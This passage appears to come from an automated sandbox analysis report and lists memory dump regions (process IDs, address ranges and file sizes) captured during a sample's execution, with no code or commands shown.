                                                                                                                                                                                                                                                                                                                      • memory/2484-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/2484-250-0x0000000000AC0000-0x0000000000AC9000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        36KB

                                                                                                                                                                                                                                                                                                                      • memory/2484-266-0x0000000000400000-0x0000000000A78000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.5MB

                                                                                                                                                                                                                                                                                                                      • memory/2484-251-0x0000000000400000-0x0000000000A78000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.5MB

                                                                                                                                                                                                                                                                                                                      • memory/2556-337-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/3144-387-0x0000000000400000-0x000000000045D000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        372KB

                                                                                                                                                                                                                                                                                                                      • memory/3144-377-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/3144-350-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/3144-380-0x0000000000400000-0x000000000045D000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        372KB

                                                                                                                                                                                                                                                                                                                      • memory/3144-383-0x0000000000400000-0x000000000045D000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        372KB

                                                                                                                                                                                                                                                                                                                      • memory/3624-199-0x00000000006B0000-0x0000000000709000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        356KB

                                                                                                                                                                                                                                                                                                                      • memory/3624-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/3764-282-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4056-364-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4068-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4108-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4208-368-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4276-323-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4276-324-0x00007FFF98800000-0x00007FFF99236000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        10.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4320-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4340-325-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4340-326-0x00007FFF98800000-0x00007FFF99236000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        10.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4404-304-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4404-300-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4404-308-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4624-281-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4624-333-0x000000002D360000-0x000000002D418000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        736KB

                                                                                                                                                                                                                                                                                                                      • memory/4624-285-0x0000000002250000-0x0000000003250000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        16.0MB

                                                                                                                                                                                                                                                                                                                      • memory/4624-340-0x000000002D420000-0x000000002D4C3000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        652KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-313-0x0000000000400000-0x0000000000452000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        328KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-227-0x00000000006B0000-0x00000000006EF000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        252KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-270-0x0000000000400000-0x0000000000452000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        328KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-271-0x000000000073D000-0x0000000000763000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4644-236-0x000000000073D000-0x0000000000763000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        152KB

                                                                                                                                                                                                                                                                                                                      • memory/4644-228-0x0000000000400000-0x0000000000452000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        328KB

                                                                                                                                                                                                                                                                                                                      • memory/4668-276-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4676-290-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-279-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-234-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-258-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-232-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-237-0x0000000000400000-0x0000000000537000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4676-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4884-248-0x0000000000400000-0x0000000000B55000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        7.3MB

                                                                                                                                                                                                                                                                                                                      • memory/4884-280-0x0000000000E02000-0x0000000000E2F000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        180KB

                                                                                                                                                                                                                                                                                                                      • memory/4884-247-0x0000000000BA0000-0x0000000000BED000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        308KB

                                                                                                                                                                                                                                                                                                                      • memory/4884-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4884-275-0x0000000000400000-0x0000000000B55000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        7.3MB

                                                                                                                                                                                                                                                                                                                      • memory/4884-259-0x0000000000E02000-0x0000000000E2F000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        180KB

                                                                                                                                                                                                                                                                                                                      • memory/4892-138-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/4892-291-0x0000000007C20000-0x0000000007C70000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        320KB

                                                                                                                                                                                                                                                                                                                      • memory/4892-261-0x0000000000B92000-0x0000000000BBE000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        176KB

                                                                                                                                                                                                                                                                                                                      • memory/4892-263-0x0000000000400000-0x0000000000A93000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        6.6MB

                                                                                                                                                                                                                                                                                                                      • memory/4892-288-0x0000000006EA0000-0x00000000073CC000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        5.2MB

                                                                                                                                                                                                                                                                                                                      • memory/4892-286-0x0000000006CC0000-0x0000000006E82000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        1.8MB

                                                                                                                                                                                                                                                                                                                      • memory/4892-249-0x00000000025B0000-0x00000000025E9000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        228KB

                                                                                                                                                                                                                                                                                                                      • memory/4936-189-0x0000000005D60000-0x0000000006304000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        5.6MB

                                                                                                                                                                                                                                                                                                                      • memory/4936-200-0x0000000005850000-0x00000000058EC000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        624KB

                                                                                                                                                                                                                                                                                                                      • memory/4936-173-0x0000000000C70000-0x0000000000CC8000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        352KB

                                                                                                                                                                                                                                                                                                                      • memory/4936-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5020-289-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5020-306-0x00000000021AC000-0x000000000223E000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        584KB

                                                                                                                                                                                                                                                                                                                      • memory/5088-136-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5132-431-0x0000000073180000-0x00000000731AA000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        168KB

                                                                                                                                                                                                                                                                                                                      • memory/5132-430-0x00000000729F0000-0x0000000072AB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                                                                        772KB

                                                                                                                                                                                                                                                                                                                      • memory/5192-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5356-404-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5428-406-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5452-407-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5472-408-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5532-410-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5552-411-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5572-413-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5604-414-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5632-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                      • memory/5668-416-0x0000000000000000-mapping.dmp